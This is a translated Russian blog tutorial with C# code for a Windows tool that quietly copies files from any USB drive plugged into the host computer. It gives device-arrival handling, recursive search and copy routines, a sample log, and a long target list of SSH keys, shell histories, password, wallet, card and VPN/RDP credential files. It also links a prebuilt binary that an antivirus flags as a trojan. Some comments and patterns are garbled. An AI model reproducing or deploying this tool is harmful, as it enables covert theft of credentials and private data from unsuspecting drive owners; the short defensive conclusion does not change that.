⬆️ ⬇️

Writing a program to steal data from a USB-drive in Windows

Task:

Write software unauthorized copying files from a legally connected USB device that does not require installation or administrator rights.

Those. legal software that can be used by attackers to harm (according to the interpretation of one of the antivirus tools).

Algorithm of the program

Lecture hall:

Beginners in programming and just interested.



An example of software application by an attacker:



We write the program:

1. We catch the connection of the USB device

Overriding the WndProc Method
protected override void WndProc(ref Message m)//  : base.WndProc(ref m); const int WM_DeviceChange = 0x219; //-   usb const int DBT_DEVICEARRIVAL = 0x8000; //  const int DBT_DEVICEREMOVECOMPLETE = 0x8004; //   if (m.Msg == WM_DeviceChange) Thread T = new Thread(_); if (m.WParam.ToInt32() == DBT_DEVICEARRIVAL) T.Start();// usb  if (m.WParam.ToInt32() == DBT_DEVICEREMOVECOMPLETE) T.Abort();// usb  




2. Choose file formats to search for (in an individual sequence - because everyone decides for himself what type of files to copy first)

File types recorded, for example, in (listBox2):
*.ppk

*.pref

*.remmina

*.sh

*.txt

*.ml*

*access*.txt

*account*

*accs*.txt

*admin*.txt

*amazon*.txt

*authorized_keys*

*balance*.txt

*bash_history*

*billing*.txt

*btc*.txt*brute*

*c6ep*.txt

*cepep*

*codes*

*connect*

*contacts*.txt

*database*

*dedic*.txt

*dedik*.txt

*domain*.txt

*ftp*.txt

*hack*.txt

*host*.txt

*icq*.txt

*id_*sa*

*id_dsa*

*id_rsa*

*known_hosts*

*ksh_history*

*login*

*mail*.txt

*merchant*.txt

*money*

*myadmin*.txt

*mysql_history*

*nano_history*

*parol*

*pass*

*pentest*

*pgsql_history*

*pma*.txt

*pref*

*qwerty*

*rdp*.txt

*remmina*

*root*

*serv*.txt

*sh_history*

*srv*.txt

*todo*.txt

*userid*

*users*

*vds*.txt

*vpn*.txt

*vps*.txt

*vuln*.txt

*wallet*

*webmon*

*zsh_history*

**.txt

**

**

**

**.txt

**.txt

**

**.txt

**.txt

**

**.txt

**

**.txt

**.txt

**

**

**

**

**.txt

**.txt

**.txt

**.txt

**.txt

**

**.txt

**

**.txt

**

**

**

**.txt

**

**.txt

**

**.txt

**.txt

**.txt

**.txt

**.txt

**.txt

**

**.txt

**.txt

**.txt

**.txt

**

**

access.txt

adm.txt

all.txt

bill.txt

card.txt

cards.txt

cc.txt

centos.txt

data.txt

ded.txt

ftps.txt

full.txt

hdd.txt

host.txt

id.txt

info.txt

key.txt

linux.txt

mail.txt

mails.txt

pern*.txt

skype*.txt

sql*.txt

ssh*.txt

sys.txt

tconn.conf

toor.txt

ubuntu.txt

usb.txt

user.txt

virtual.txt

*.txt

*.txt

*.txt

**

*pass*

*pwd*

*login*

**

*vk.com*



**

*.xls*

*.doc*

*.rtf

*.JPG

*.jpeg

*.pgf

*.bmp

*.cr2

*config*

**

**





3. We are looking for files on a USB-drive.

Search function:
 private ArrayList F;//    private void _() Thread.Sleep(4000);//         foreach (var dInfo in DriveInfo.GetDrives()) if (dInfo.IsReady && dInfo.DriveType == DriveType.Removable) for (int i = 0; i < listBox2.Items.Count; i++) { foreach (string file in Directory.GetFiles(@dInfo.Name, listBox2.Items[i].ToString(), SearchOption.AllDirectories)) F.Add(new FILEclass(file, Path.GetFileName(file))); } 




5. Copy files from a connected USB-drive to your computer

Copy function
 private void cheat() ... ... //    Directory.CreateDirectory("Liked " + DateTime.Now.Year + "." + DateTime.Now.Month + "." + DateTime.Now.Day); int copied = 0; int copy_err = 0; int exist = 0; for (int i = 0; i < F.Count; i++) { string sourceName = Path.GetFileName((((FILEclass)(F[i])).Fullname)); string source = ((FILEclass)(F[i])).Fullname; string dest = Dir + @"\" + ((FILEclass)(F[i])).name; string destName = Path.GetFileName(Dir + @"\" + ((FILEclass)(F[i])).name); if (sourceName.Equals(destName)) if (File.Exists(source)) if (File.Exists(dest)) try { if (FileCompare(source, dest)) exist++; //    else//  -   File.Copy(source, Dir + @"\" + Timenow() + "s. " + ((FILEclass)(F[i])).name); copied++; } catch{copy_err++; }//   USB-  else { try File.Copy(source, dest); catch { copy_err++; } copied++; } else copy_err++; } 


The function of comparing two files
  //https://support.microsoft.com/ru-ru/kb/320348 private bool FileCompare(string file1, string file2) int file1byte; int file2byte; FileStream fs1; FileStream fs2; if (file1 == file2) return true;//        fs1 = new FileStream(file1, FileMode.Open); fs2 = new FileStream(file2, FileMode.Open); if (fs1.Length != fs2.Length) fs1.Close(); fs2.Close(); return false; do { //  ,      file1byte = fs1.ReadByte(); file2byte = fs2.ReadByte(); } while ((file1byte == file2byte) && (file1byte != -1)); fs1.Close(); fs2.Close(); return ((file1byte - file2byte) == 0); 


6. Logging

By adding a log, you can easily see the approximate folder structure on a USB device and what is copied:



 14.08.2015 21:25:13 =============================================   14.08.2015 21:25:17    14.08.2015 21:25:18   F:\123hack.txt 14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\App1.csproj.FileListAbsolute.txt 14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\LanguageQualifiers.txt 14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\ProjectArchitectures.txt 14.08.2015 21:25:18   F:\ \\Cisco Mars incident parser\Cisco Mars incident parser\obj\Debug\Cisco Mars incident parser.csproj.FileListAbsolute.txt 14.08.2015 21:25:18   F:\ \\dots\dots\obj\Debug\dots.csproj.FileListAbsolute.txt 14.08.2015 21:25:18   F:\ \\genovirus\genovirus\Assets\AboutAssets.txt 14.08.2015 21:25:18   F:\ \\genovirus\genovirus\Resources\AboutResources.txt 14.08.2015 21:25:18   F:\ \\TheGenoVirus\TheGenoVirus\obj\Debug\ResourceTypeUsage.txt 14.08.2015 21:25:18   F:\ \\TheGenoVirus\TheGenoVirus\obj\Debug 


7. Copying data from external HDDs will be left as “homework”



Findings:

Do not store sensitive information on removable USB devices and do not connect them to non-trusted devices.

')

Ready example in "Cloud@mail.ru"



www.virustotal.com : 1/56 (antivirus "VBA32" defines as "Trojan.MSIL.gen.11").

Source: https://habr.com/ru/post/264513/



All Articles